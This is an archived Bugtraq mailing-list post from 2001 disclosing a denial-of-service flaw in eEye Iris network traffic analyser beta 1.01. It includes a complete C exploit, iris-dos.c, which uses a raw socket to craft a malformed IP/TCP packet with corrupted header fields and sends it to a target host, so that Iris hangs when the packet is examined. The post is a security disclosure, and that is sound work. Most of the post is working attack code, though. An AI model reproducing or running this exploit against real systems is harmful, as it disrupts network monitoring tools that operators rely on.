[18736] in bugtraq
eEye Iris the Network traffic analyser DoS
daemon@ATHENA.MIT.EDU (grazer)
Mon Jan 22 20:16:26 2001
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary="==IMail_v5.0=="
Message-ID: <200101211927.AA211878078@mail.gelrevision.nl>
Date: Sun, 21 Jan 2001 19:27:08 +0100
Reply-To: termaat@gelrevision.nl
From: grazer <termaat@gelrevision.nl>
To: BUGTRAQ@SECURITYFOCUS.COM
------------------------------------------------------------------------
This mail message contains standard MIME attachments. If you see this
note, your e-mail program does not support MIME. You may need a MIME-
compliant mail reader to read any non-text attachments in this message.
------------------------------------------------------------------------
--==IMail_v5.0==
Content-Type: text/plain; charset=us-ascii
Hi there,
There exists a vulnerability that will cause the iris network traffic analyser to hang.
I have included an exploit, that will demonstrate the bug, the exploit will send a packet to the remote host,
when the remote host opens the packet (to examine it) iris will quit, leaving an error message.
Sincerely yours,
Wouter ter Maat aka grazer
digit-labs information security
http://www.digit-labs.org
--==IMail_v5.0==
Content-Type: text/plain; name="iris-dos.c"
Content-Transfer-Encoding: binary
/* Denial of Service attack against :
* Iris The Network Traffic Analyzer beta 1.01
* ------------------------------------------------
*
* Will create an incorrect packet which will cause
* Iris to hang when it is opened by a user.
*
* Vulnerability found by : grazer@digit-labs.org
* Exploit code by : grazer@digit-labs.org
*
* Respect to the guys from eEye, for there fast
* response.
*
* greetings to hit2000, hwa, synnergy, security.is
* digit-labs.
*
* ---------------> free sk8!!!! <-----------------
*
* ------------------------------------------------
* http://www.digit-labs.org
* grazer@digit-labs.org
* ------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/types.h>
#include <sys/socket.h>
int build_packet(int sfd, u_long srcaddr, u_long dstaddr);
struct pseudo {
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
};
int main(int argc,char **argv){
int rawfd, check, one=1;
struct sockaddr_in raddr;
struct in_addr source_ip, desti_ip;
struct ip *ip;
struct tcphdr *tcp;
while (argc<3) {
fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] ); exit(0);}
fprintf(stderr, "\nStarting Iris DoS...\n");
if((check=gethostbyname(argv[2])==NULL)) {
fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); }
source_ip.s_addr= inet_addr(argv[1]);
desti_ip.s_addr = inet_addr(argv[2]);
if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
fprintf(stderr, "\n You need root for this..");
exit(0); }
setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);
build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr);
close(rawfd);
return 1; }
int build_packet(int sfd, u_long srcaddr, u_long dstaddr) {
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in sin;
struct in_addr src_inaddr, dest_inaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));
bzero(packet, sizeof(packet));
bzero(&sin,sizeof(sin));
src_inaddr.s_addr = srcaddr;
dest_inaddr.s_addr = dstaddr;
pseudo->saddr = srcaddr;
pseudo->daddr = dstaddr;
pseudo->zero = 1;
pseudo->protocol=IPPROTO_TCP;
pseudo->length = htons(sizeof (struct tcphdr));
ip->ip_v = -1;
ip->ip_hl = -1;
ip->ip_id = -1;
ip->ip_src = src_inaddr;
ip->ip_dst = dest_inaddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_ttl = 40;
ip->ip_off = -1;
ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
tcp->seq = htonl(rand());
tcp->ack = htonl(rand());
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=dstaddr;
sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
(struct sockaddr *) &sin,sizeof(sin));
fprintf(stderr, "\n Packet send... \n\n" );
return 1;}
--==IMail_v5.0==--
